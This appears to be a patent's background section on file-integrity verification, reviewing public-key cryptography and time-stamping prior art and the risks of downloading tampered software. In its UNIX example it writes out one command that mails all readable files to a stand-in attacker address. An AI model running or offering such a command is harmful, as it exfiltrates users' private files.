Advances in technology with increasing capabilities for electronic file duplication and rapid file transport make the sharing over a network of electronic documents, software, data, pictures, and other information, incredibly easy. The growth of the Internet has provided millions of people with the ability to share files with others they have never met. For many people, the Internet has become the primary means for sharing information. Furthermore, the ability to provide almost instant access to information to millions of users has revolutionized the way many businesses are run. As an example, many software vendors distribute updates of their software through the Internet or other on-line services. Other users retrieve stock quotes or news stories, or conduct research over the Internet. However, it is well known to all who practice in the art that electronic files are easily corrupted, that even secure systems connected to network can be attacked and breached with subsequent corruption of a file or files, and that one user could masquerade as the creator of a file posting a corrupted version of the file on the Internet to be accessed by other trusting unsuspecting users. In the current environment, users who receive files from sources on the Internet are unable to verify that the file they received is uncorrupted or whether the file is truly a file created by the presumed creator.
Early technical approaches to verifying the integrity of electronic files focused on verifying the transmissions in a bilateral communications environment. In such an environment, the sender of the document desires to verify to the receiver of a document, the source and original content of the transmitted document. Such approaches used "private key" cryptographic schemes for message transmission between a limited universe of individuals who are known to one another and who alone know the decrypting key. Encryption of the message ensures against tampering, and the fact that application of the private key reveals the "plaintext" of the transmitted message serves as proof that the message was transmitted by an individual in the defined universe.
An advance in the art was effected with the application of "public key" cryptography as disclosed and implemented by Rivest et al. in U.S. Pat. No. 4,405,829, issued Sep. 20, 1983. This scheme expands the defined universe to a substantially unlimited number of system subscribers who are unknown to one another, but for a public directory. However, a recipient's trust in the integrity of a document is still based on a verifiable bilateral communication.
Another advance in the art was effectuated by Haber and Stornetta as disclosed in U.S. Pat. Nos. 5,136,646 and 5,136,647, both issued Aug. 4, 1992. Their inventions disclose methodologies for fixing the time and content of an electronic file. Their process generally works as follows: (1) the creator of an electronic file would, using a one-way hash function, reduce the file to a hash value of set size, (2) the creator of the file would then send the hash value to a third party time stamping agency (TSA), (3) the TSA adds time data to the hash value to create a receipt, (4) the TSA then applies a cryptographic signature, using the well known public key cryptographic scheme, to the combined hash value and time data to create digital certificate establishing the temporal existence of the file, (5) the TSA then sends the digital certificate back to the creator of the file, and (6) the creator of the file stores the certificate for later proof of the file's temporal existence. In order to prove that the certificate was in fact created by the TSA, the TSA's public key would be used to verify that the file was signed by some entity using TSA's private key, and since TSA is the only entity that should have access to the private key, it can be presumed that the TSA is the entity that created the certificate. Haber and Stornetta's methodologies use public key cryptographic procedures to verify the bilateral communications between the TSA and the creator (i.e. author) of the file. However, even though this prior art procedure would establish the temporal existence of the file, it does not prevent malicious users modifying files and then time stamping the new corrupted file or from masquerading as a legitimate author. This problem is best illustrated using the example of software updates available on the Internet.
It has become common practice for users to obtain software from public sites on the Internet. However, such a practice is very dangerous. As an example, in UNIX systems, any program that is executed will run with the same privileges as the user who invoked it. So if a user downloads and runs a program, that unbeknownst to the user, was placed in a file on a server by some other malicious individual, that software has access to all of users files and can send mail, post to newsgroups, and attempt illegal break-ins on behalf of this unsuspecting user. For example, the following Unix command: EQU unix % find/-name.backslash.*exec cat {}.backslash.;.vertline.mail.backslash.BadGuy@company.com
causes all of the files that user can read, in the entire file system to be mailed to BadGuy@company.com. A more sophisticated program could do more serious damage.
Personal Computer (PC) users are also at risk. It is easy for a malicious user to insert viruses into a program that is posted to the Internet. A sophisticated malicious user is also able to cause a corrupted version of a document or program to be downloaded even without breaking into a public server by attacking the Domain Name Server (DNS) or hijacking the ftp connection. A Domain Name Server is a server used in the Internet community to map a domain name to an Internet numbered address known as an IP address. If a malicious user on the Internet attacked a DNS and accessed the DNS records, this malicious user could substitute their IP address for some other parties domain name. Therefore, if another user tried to communicate with a user identified by the domain name, this other user would actually be communicating with the malicious user and not the intended user. In each of these cases, a sophisticated user could, using Haber and Stornetta's methods, legitimately establish the temporal existence of the corrupted file. However, the third party user of the software update has no way of knowing whether the file they have downloaded is the author's uncorrupted file; all they would know is that the file is uncorrupted since it was fixed in time. Using the prior art approaches, users would still have to enter in to some form of secure bilateral communication in order to be sure that the file a user is downloading is the uncorrupted file from the real author. These limitations in the current art are a burden on the secure distribution of electronic files in public networks thereby limiting the use of these networks for sharing files in a manner on which users can rely.